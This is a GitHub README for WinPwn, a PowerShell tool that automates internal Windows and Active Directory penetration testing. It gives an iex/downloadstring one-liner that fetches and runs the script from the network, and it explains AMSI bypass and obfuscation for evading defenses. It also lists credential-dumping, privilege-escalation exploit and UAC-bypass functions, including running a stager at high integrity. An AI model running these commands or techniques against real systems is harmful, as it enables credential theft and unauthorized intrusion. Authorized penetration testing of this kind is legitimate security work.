- Notifications
You must be signed in to change notification settings - Fork536
Automation for internal Windows Penetrationtest / AD-Security
License
S3cur3Th1sSh1t/WinPwn
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I also often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration.The script is mostly based on well-known large other offensive security Powershell projects.
Any suggestions, feedback, Pull requests and comments are welcome!
Just Import the Modules with:
Import-Module .\WinPwn.ps1
oriex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
To bypass AMSI take one of the existingbypass techniques, find the AMSItrigger and manually change it in the bypass function or encode the trigger string. Alternatively obfuscate the whole script.
If you find yourself stuck on a windows system with no internet access - no problem at all, just useOffline_Winpwn.ps1
, the most important scripts and executables are included.
Functions available after Import:
- Obfuscated Invoke-Mimikatz version
- Safetykatz in memory
- Dump lsass using rundll32 technique
- Download and run obfuscated Lazagne
- Dump Browser credentials
- Customized Mimikittenz Version
- Exfiltrate Wifi-Credentials
- Dump SAM-File NTLM Hashes
- SharpCloud
- Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
- Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
- Checks the Powershell event logs for credentials or other sensitive informations
- Collect Browser Credentials and history
- Search for passwords in the registry and on the file system
- Find sensitive files (config files, RDP files, keepass Databases)
- Search for .NET Binaries on the local system
- Optional: Get-Computerdetails (Powersploit) and PSRecon
- Collect various domain informations for manual review
- Find AD-Passwords in description fields
- Search for potential sensitive domain share files
- Unconstrained delegation systems/users are enumerated
- Generate Bloodhound Report
- MS17-10 Scanner for domain systems
- Bluekeep Scanner for domain systems
- SQL Server discovery and Auditing functions - PowerUpSQL
- MS-RPRN Check for Domaincontrollers or all systems
- Group Policy Audit with Grouper2
- An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon
- Check Printers for common vulns
- Search for Resource-Based Constrained Delegation attack paths
- Check all DCs for zerologon - CVE-2020-1472
- And more, just take a look
- itm4ns Invoke-PrivescCheck
- winPEAS
- Powersploits PowerUp Allchecks, Sherlock, GPPPasswords
- Dll Hijacking, File Permissions, Registry permissions and weak keys, Rotten/Juicy Potato Check
- MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
- MS16-032 - (2008/7/8/10/2012)!
- MS16-135 - (WS2k16 only)!
- CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
- CVE-2019-0841 - April 2019!
- CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
- CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
- CVE-2019-1215 - September 2019 - x64 only!
- CVE-2020-0638 - February 2020 - x64 only!
- CVE-2020-0796 - SMBGhost
- CVE-2020-0787 - March 2020 - all windows versions
- CVE-2021-34527/CVE-2021-1675 - June 2021 - PrintNightmare
- CVE-2021-40449 - CallbackHell - October 2021
- Juicy-Potato Exploit
- itm4ns Printspoofer
- UAC Magic, Based on James Forshaw's three part post on UAC
- UAC Bypass cmstp technique, by Oddvar Moe
- DiskCleanup UAC Bypass, by James Forshaw
- DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte
- Pop System Shell using CreateProcess
- Pop System Shell using NamedPipe Impersonation
- Pop System Shell using Token Manipulation
- Bind System Shell using UsoClient DLL load or CreateProcess
Without parameters, most of the functions can only be used from an interactive shell. So i decided to add the parameters-noninteractive
and-consoleoutput
to make the script usable froman asynchronous C2-Framework like Empire, Covenant, Cobalt Strike or others.Additionally the-repo
parameter was added to use WinPwn with all its features from a local repository. They can be used as follows:
Usage:
-noninteractive -> No questions for functions so that they run with predefined or user defined parameters
-consoleoutput -> The loot/report folders are not created. Every function returns the output to the consoleso that you can take a look at everything in the Agent logs of your C2-FrameworkExamples:
WinPwn -noninteractive -consoleoutput -DomainRecon
-> This will return every single domain recon script andfunction and will probably give you really much output
WinPwn -noninteractive -consoleoutput -Localrecon
-> This will enumerate as much information for the localsystem as possible
Generalrecon -noninteractive
-> Execute basic local recon functions and store the outputin the corresponding folders
UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp
-> Execute a stager in a high integrityprocess from a low privileged session
Kittielocal -noninteractive -consoleoutput -browsercredentials
-> Dump Browser-Credentials via Sharpwebreturning the output to console
Kittielocal -noninteractive -browsercredentials
-> Dump SAM File NTLM-Hashes and storethe output in a file
WinPwn -PowerSharpPack -consoleoutput -noninteractive
-> Execute Seatbelt, PowerUp, Watson andmore C# binaries in memory
Dotnetsearch -consoleoutput -noninteractive
-> Search inC:\Program Files\
andC:\Program Files (x86)\
for .NET assemblies
WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo
-> Use a local webserver as offline repo to use WinPwn without internet access
Get_WinPwn_Repo.sh:
Usage:./Get_WinPwn_Repo.sh {Option}
Example:./Get_WinPwn_Repo.sh --install
Options:--install Download the repository and place it to ./WinPwn_Repo/--remove Remove the repository ./WinPwn_Repo/--reinstall Remove the repository and download a new one to ./WinPwn_Repo/--start-server Start a python HTTP server on port 8000--help Show this help
- Some obfuskation
- More obfuscation
- Proxy via PAC-File support
- Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories
- More Recon/Exploitation functions
- Add menu for better handling of functions
- Amsi Bypass
- Block ETW
- Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
- Arvanaghi - SessionGopher
- PowerShellMafia - Powersploit
- Dionach - PassHunt
- A-mIn3 - WINSpect
- 411Hall - JAWS
- sense-of-security - ADrecon
- dafthack - DomainPasswordSpray
- rasta-mouse - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs
- AlessandroZ - LaZagne
- samratashok - nishang
- leechristensen - Random Repo, Spoolsample, other ps1 scripts
- HarmJ0y - Many good Blogposts, Gists and Scripts, all Ghostpack binaries
- NETSPI - PowerUpSQL
- Cn33liz - p0wnedShell
- rasta-mouse - AmsiScanBufferBypass
- l0ss - Grouper2,Snaffler,Grouper3
- dafthack - DomainPasswordSpray
- enjoiz - PrivEsc
- itm4n - Invoke-PrivescCheck & PrintSpoofer
- James Forshaw - UACBypasses
- Oddvar Moe - UACBypass
- Carlos Polop - winPEAS
- gentilkiwi - Mimikatz, Kekeo
- hlldz - Invoke-Phantom
- Matthew Graeber - many Ps1 Scripts which are nearly used everywhere
- Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
- Sean Metcalf - SPN-Scan + many usefull articles @adsecurity.org
- @l0ss and @Sh3r4 - Snaffler
- FSecureLABS - GPO Tools
- vletoux - PingCastle Scanners
- NCCGroup + BC-Security - ZeroLogon Scanner
- All people working on Bloodhound - SharpHound Collector
- klezVirus - SharpLdapRelayScan
- cube0x0 - LdapSignCheck + other toolings
- @s4ntiago_p - NanoDump
- @thefLinkk - Handlekatz
- @Mayyhem - SharpSCCM
- @cube0x0 - LdapSignCheck
- @klezVirus - SharpLdapRelayScan
- @HarmJ0y, @leechristensen, @CCob - Certify
- @Yudasm - ShadowHound
- Many more people in the Community - I'm sure, that I've forgotten many other invididuals who indirectly contributed into this Script
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
About
Automation for internal Windows Penetrationtest / AD-Security